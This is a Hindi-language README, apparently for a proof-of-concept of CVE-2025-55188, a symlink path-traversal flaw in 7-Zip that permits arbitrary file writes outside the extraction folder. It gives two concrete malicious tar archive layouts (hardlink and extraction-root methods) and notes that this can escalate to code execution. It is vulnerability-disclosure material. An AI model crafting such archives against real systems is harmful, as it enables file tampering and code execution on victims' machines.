
CVE-2025-55188 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो सिमलिंक पथ ट्रैवर्सल के माध्यम से 7-Zip में मनमानी फ़ाइल लेखन प्रदर्शित करता है, और मनमाने कोड निष्पादन तक वृद्धि के साथ।
CVE-2025-55188 का प्रूफ-ऑफ-कॉन्सेप्ट, 7-Zip में एक मनमाना फ़ाइल लेखन। संस्करण 25.01 में पैच किया गया, जो 3 अगस्त 2025 को जारी हुआ।
नोट: CVE-2025-55188, CVE-2025-11001 से भिन्न है।
जिस संस्करण में CVE-2025-11001 को पैच किया गया था (संस्करण 25.00) वह अभी भी असुरक्षित है प्रतीकात्मक लिंक हमलों के माध्यम से मनमाना कोड निष्पादन के लिए CVE-2025-55188 के कारण।
CVE-2025-55188 की खोज और प्रकाशन CVE-2025-11001 के प्रकाशन से पहले किया गया था।
अधिक विस्तृत विवरण और लेख के लिए https://lunbun.dev/blog/cve-2025-55188/ देखें।
यह भेद्यता काफी सीधी है।
पथ ट्रैवर्सल सिमलिंक के माध्यम से मनमाने ढंग से फ़ाइलें लिखने के लिए किया जाता है। वहां से, महत्वपूर्ण फ़ाइलों में लिखकर मनमाना फ़ाइल लेखन को मनमाना कोड निष्पादन तक बढ़ाया जा सकता है।
सिमलिंक सुरक्षा जाँचों में एक किनारे के मामले के कारण सिमलिंक पथ ट्रैवर्सल संभव है। मुझे ऐसा करने के दो तरीके मिले। अधिक जानकारी के लिए ब्लॉग पोस्ट देखें।
निम्नलिखित .tar फ़ाइल निष्कर्षण पर ../a/b/file.txt में लिखेगी:
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_hardlink हार्डलिंक विधि का उपयोग करने वाला कोड शामिल है।
निम्नलिखित .tar फ़ाइल निष्कर्षण पर ../file.txt में लिखेगी (केवल लिनक्स पर):
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_extraction_root निष्कर्षण रूट विधि का उपयोग करने वाला कोड शामिल है।